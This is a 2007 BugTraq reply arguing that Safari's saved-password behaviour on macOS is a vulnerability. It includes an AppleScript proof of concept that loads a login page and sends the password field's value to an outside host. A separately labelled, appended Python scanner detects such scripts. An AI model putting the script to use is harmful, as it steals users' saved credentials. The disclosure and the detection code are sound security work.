BugTraq
Re: RE: Apple Safari on MacOSX may reveal user's saved passwords May 14 2007 10:35PM
poplix papuasia org (1 replies)
Mark, you read it correctly and you're right, anyway a malicious user at your console should not be able to read your passwords. Also note that to steal saved passwords it's sufficient to entice a victim to execute a malicious script like that:

--BOF
tell application "Safari"
open location "https://www.target.com"
end tell

do shell script "/bin/sleep 10"

tell application "Safari"
do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value" in document 1
end tell
--EOF

I agree with you in saying that the execution of malicious scripts can lead to much more dangerous attacks, anyway I consider this a vulnerability and I don't know why Apple believes this is the correct behaviour...

many thanks for your comment

-p
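
A defender-side check for the pattern in the script above, as an added example that is not part of the original post: it scans AppleScript source for Safari `do JavaScript` calls that read a password field and rates them higher when the same JavaScript also navigates or sends data off the page. The function name, the regex heuristics and the sample scripts (with `.example` hosts) are constructed for illustration.

```python
import re

# Constructed samples for the check below (not from any real incident).
SUSPICIOUS = '''tell application "Safari"
open location "https://www.example.com"
end tell
do shell script "/bin/sleep 10"
tell application "Safari"
do JavaScript "document.location.href='http://collector.example/?p='+document.login
form.password.value" in document 1
end tell
'''
BENIGN = '''tell application "Safari"
do JavaScript "document.title" in document 1
end tell
'''

# Heuristics (assumptions of this example, tune for your own corpus).
TELL_SAFARI = re.compile(r'tell application "Safari"(.*?)end tell', re.S | re.I)
DO_JS = re.compile(r'do JavaScript\s+"((?:[^"\\]|\\.)*)"', re.S | re.I)
OPENS_URL = re.compile(r'open location\s+"([^"]+)"', re.I)
READS_FIELD = re.compile(r"password[\w.\[\]]*\.value", re.I)
SENDS_OUT = re.compile(r"location(?:\.href)?\s*=|new\s+Image|XMLHttpRequest|\.src\s*=", re.I)

def audit_applescript(source):
    """Return findings for Safari-driving AppleScript that reads password fields."""
    findings = []
    opened = OPENS_URL.findall(source)           # pages the script loads first
    for block in TELL_SAFARI.findall(source):
        for js in DO_JS.findall(block):
            js = re.sub(r"\s*\n\s*", "", js)     # undo mail/editor line wrapping
            if not READS_FIELD.search(js):
                continue
            sends = bool(SENDS_OUT.search(js))
            findings.append({
                "severity": "high" if sends else "medium",
                "sends_off_page": sends,
                "pages_opened": opened,
                "javascript": js,
            })
    return findings

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, audit_applescript(text))
```

Compiled `.scpt` files have to be converted to source text (for example with `osadecompile`) before a text scan like this can see them.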
